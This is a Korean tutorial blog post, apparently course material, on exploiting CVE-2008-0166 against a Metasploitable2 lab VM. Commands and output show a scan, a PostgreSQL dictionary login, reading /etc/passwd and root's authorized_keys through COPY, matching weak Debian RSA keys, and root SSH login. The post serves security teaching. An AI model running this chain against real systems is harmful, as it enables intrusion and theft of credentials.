정보보안(구버전)/Metasploit 2016. 6. 3. 10:54

Metasploit - 07. 취약점 발견 및 공격 (CVE-2008-0166)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux

 

 

 - CVE-2008-0166은 Debian OpenSSL 패키지 난수 발생 취약점을 의미한다.

 - 암호화 키가 생성될때, 사용하는 임의의 데이터를 추측하기 위한 취약점을 Exploit할 수 있게 된다.

 - 만약, Exploit이 가능하다면 암호화 키를 손상시켜 민감한 데이터 접근 할 수 있게 된다.

 - Debian OpenSSL 0.9.8c-4etch3 이전 버전만 해당 사항

 - exploit-db 사이트 -> search -> CVE-2008-0166 검색

 - https://www.exploit-db.com/exploits/5720/

 

 

[실습 단계]

 

스캔 -> PostgresSQL ID/PASSWORD 공격 -> PostgressSQL 접속 -> 사용자 계정 정보 획득 ->

 

-> SSH Key 해킹 -> SSH 접속 실시

 

 

 

Ex1) Metasploitable2-Linux 관리자 암화 설정

 

@ Metasploitable2-Linux

 

msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password : toor
passwd : password updated successfully
root@metasploitable:~# exit
logout
msfadmin@metasploitable:~$

 

 

 

 

Ex2) SSH RSA 관련 파일 다운로드 및 압출 해지

 

@ Kali Linux

 

 - Exploit DB OpenSSL 검색 실시

 

root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                       |  Path
                                                                     | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs     | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)    | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit               | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)      | ./multiple/remote/5622.txt
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)      | ./multiple/remote/5632.rb
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)    | ./linux/remote/5720.py
~ 중간 생략 ~

 

 

 

 - SSH RSA 정보 및 다운로드 링크 확인 ('5622.txt' 파일)

 

root@kali:~# cat /usr/share/exploitdb/platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

 

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

 

On an unpatched system, which doesn't need to be debian, do the following:

 

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

 

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
     https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

 

2. Extract it to a directory

~ 중간 생략 ~

 

 

 

 - SSH RSA 관련 파일 다운로드 실시

 

root@kali:~# cd /var/tmp
root@kali:/var/tmp#

root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2

 

--2016-06-03 11:28:57--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121
Connecting to github.com (github.com)|192.30.252.121|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2 [following]
--2016-06-03 11:28:58--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 103.245.222.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’

 

5622.tar.bz2             100%[===============================>]  47.90M   989KB/s   in 33s   

 

2016-06-03 11:29:34 (1.45 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]

 

 

 - SSH RSA 파일 압축 해지 실시

 

root@kali:/var/tmp# tar xvif 5622.tar.bz2

rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub

~ 중간 생략 ~

 

 

root@kali:/var/tmp# cd

root@kali:~#

 

 

 

Ex3) '192.168.20.204' 스캔 실시

 

 - nmap을 이용하여 '192.168.20.204'에 대해서 스캔을 실시한다.

 

@ Kali Linux

 

root@kali:~# nmap -sV 192.168.20.204

 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

 

 


Ex4) PostgreSQL 아이디/패스워드 사전 파일 공격 실시

 

root@kali:~# msfconsole -q

 

msf > search postgres_login

Matching Modules
================

   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   auxiliary/scanner/postgres/postgres_login                   normal  PostgreSQL Login Utility

 

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                     yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS                                                                                          yes       The target address range or CIDR identifier
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads
   USERNAME          postgres                                                                      no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

 


msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204


msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true

 


msf auxiliary(postgres_login) > exploit

[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > exit
root@kali:~#

 

 

 

 

Ex5) PostgresSQL 서버 접속 실시 및 DB 확인

 

@ Kali Linux

 

 - 'postgres/postgres'를 이용하여 Metasploitable2-Linux PostgresSQL에 접속한다.

 

root@kali:~# psql -h 192.168.20.204 -U postgres
Password for user postgres: postgres
psql (9.4.3, server 8.3.1)
SSL connection (protocol: TLSv1, cipher: DHE-RSA-AES256-SHA, bits: 256, compression: off)
Type "help" for help.

postgres=#

 

 

  - PostgreSQL 버전 확인

 

postgres=# select version();
                                            version                                           
-----------------------------------------------------------------------------------------------
 PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
(1 row)

 

 

 - 사용자 테이블 확인

 

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
 postgres |       10 | t           | t        | t         | ******** |          |
(1 row)

 

 

 - 'test' 사용자 추가 및 확인

 

postgres=# create user test with password 'test1234';
CREATE ROLE

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
 postgres |         10 | t                | t           | t             | ******** |             |
 test        |    16384 | f                |           | f             | ******** |             |
(2 rows)

 

 

 - 'test' 사용자 권한 상승 및 확인

 

postgres=# alter user test with superuser;
ALTER ROLE

postgres=# select * from pg_user;
 usename  | usesysid | usecreatedb | usesuper | usecatupd |  passwd  | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
 postgres |         10 | t                | t           | t             | ******** |             |
 test        |    16384 | f                | t           | f             | ******** |             |
(2 rows)

 


 - 모든 스키마 확인 및 데이터베이스 확인

 

postgres-# \dn
  List of schemas
  Name  |  Owner  
--------+----------
 public | postgres
(1 row)

 


postgres-# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges  
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8      |
 template0 | postgres | UTF8     | =c/postgres          +
               |             |             | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
               |             |             | postgres=CTc/postgres
(3 rows)

 

 

 - accounts 테이블 생성 및 '/etc/passwd' 내용 복사

 

postgres=# create table accounts (linux_users text);
CREATE TABLE

postgres=# copy accounts from '/etc/passwd';
COPY 37

 

 

 - accounts 테이블 내용에 'bash' 글자가 들어간 내용 확인

 

postgres=# select * from accounts where linux_users like '%bash%';
                                 linux_users                                 
------------------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
 postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
 service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)

 

 

- sshkeys 테이블 생성 및 '/root/.ssh/authorized_keys' 내용 복사

 

postgres=# create table sshkeys (auth_key text);
CREATE TABLE

 

postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1

 

 

 - sshkeys 테이블 내용에 'ssh-rsa' 글자가 들어간 내용 확인


postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';

 

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

(END)

 

q


 

 

 - PostgresSQL 접속 종료 

 

postgres=# \q
root@kali:~#

 

 


 

Ex6) SSH RSA 키를 획득하기 위한 PostgresSQL 서버 재접속

 

 - sshkeys 테이블 접속 및 SSH Key 저장 실시

 

root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
                                                                                                                                                                                                      

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

 

 

 - 'sshkeys.txt' 파일 확인

 

root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229  6월  3 12:42 sshkeys.txt

 

 

root@kali:~# cat sshkeys.txt

                                                                                           auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)

 

 

 - 'sshkeys.txt' 내용 중 'ssh-rsa' 글자를 검색하여 2번째 필드까지 확인

 

root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'


AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==

 

 

 - '==' 부분만 빼고 다시 확인

 

root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'

 

AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

 

 

 - '/var/tmp/rsa/2048/8.pub' 파일 내용중 'sshkeys.txt' 파일과 동일한 내용을 검색하여 'keys.txt'로 저장 실시

 

 

 

root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee keys.txt


/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

root@kali:~# ls keys.txt
keys.txt


root@kali:~# cat keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

 

 - '/var/tmp/rsa/2048' 디렉토리 파일 중 'keys.txt' 내용이 들어가 있는 파일 이름과 필터링 실시

 

root@kali:~# cat keys.txt | awk -F: '{print $1}'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub

 

 

 - 파일 이름 중 '.pub'을 필터링하여 확인 실시


root@kali:~# cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429

 

 - Metasploitable2-Linux으로 SSH 접속 실시

 

root@kali:~# ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Thu Jun  2 04:00:18 2016 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

 

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#

root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~#

 

 

 

[참고] 'bash: /bin/fgrep: 인수 명단이 너무 김' 오류 메세지가 나오면, rsa/2048 디렉토리로 이동하여 'xargs' 명령어 사용

 

 

 - '5622.tar.bz2' 파일을 root home 디렉토리에 압축해지 한 경우

 

root@kali:~# cd /root/rsa/2048
root@kali:~/rsa/2048#

root@kali:~/rsa/2048# ls *.pub | xargs fgrep `grep "ssh-rsa" /root/sshkeys.txt | awk '{print $2}' | sed 's/==$//'` | tee /root/keys.txt

 

 

root@kali:~/rsa/2048# cat /root/keys.txt
57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

 

root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}'
57c3115d77c56390332dc5c49978627a-5429.pub

 

root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
57c3115d77c56390332dc5c49978627a-5429

 

root@kali:~/rsa/2048# ssh -i `cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.

Last login: Sun Feb 25 21:56:50 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.

root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~/rsa/2048#

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q